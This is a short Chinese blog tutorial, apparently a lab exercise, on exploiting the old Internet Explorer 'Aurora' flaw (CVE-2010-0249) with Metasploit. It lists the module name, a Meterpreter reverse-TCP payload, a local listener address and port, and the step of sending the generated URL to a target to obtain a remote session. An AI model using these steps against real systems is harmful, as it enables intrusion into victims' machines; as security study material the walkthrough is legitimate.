CVE-2010-0249 简单利用

admin
admin
admin
138856
文章
114
评论
2020年11月7日10:43:41评论280 views字数 602阅读2分0秒阅读模式


CVE-2010-0249 简单利用

漏洞详情
微软官方发布了Microsoft Security Advisory (979352)安全公告,确认在IE6/7/8版本中,存在零日漏洞,涉及的操作系统包括:Windows 2000 SP4, Windows XP/2003/Vista/2008,Windows 7。微软在安全公告中表示,IE在特定情况下,有可能访问已经被释放的内存对象导致任意代码执行,该漏洞可以被用来进行网页挂马。该漏洞即后来被称为“Aurora”(极光)的零日漏洞。


CVE-2010-0249 简单利用


漏洞利用
kali打开msf,搜索MS10-002的漏洞利用模块后进入

exploit/windows/browser/ms10_002_aurora模块。

CVE-2010-0249 简单利用


设置并查看参数
set payload windows/meterpreter/reverse_tcp
set srvhost 192.168.1.70
set srvport 7070
show options

CVE-2010-0249 简单利用


参数设置没问题后输入run执行,复制URL发给目标。

CVE-2010-0249 简单利用


用IE打开URL返回kali查看结果

CVE-2010-0249 简单利用


kali已经成功和目标服务器创建一个会话,查看文件及权限。

CVE-2010-0249 简单利用


利用成功,可以返回当前用户信息

注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。


CVE-2010-0249 简单利用



推荐文章++++

CVE-2010-0249 简单利用

*CVE-2018-18852 简单利用

*CVE-2020-5902 简单利用

*CVE-2018-8639 简单利用


CVE-2010-0249 简单利用

CVE-2010-0249 简单利用


本文始发于微信公众号(黑白之道):CVE-2010-0249 简单利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月7日10:43:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2010-0249 简单利用https://cn-sec.com/archives/180387.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息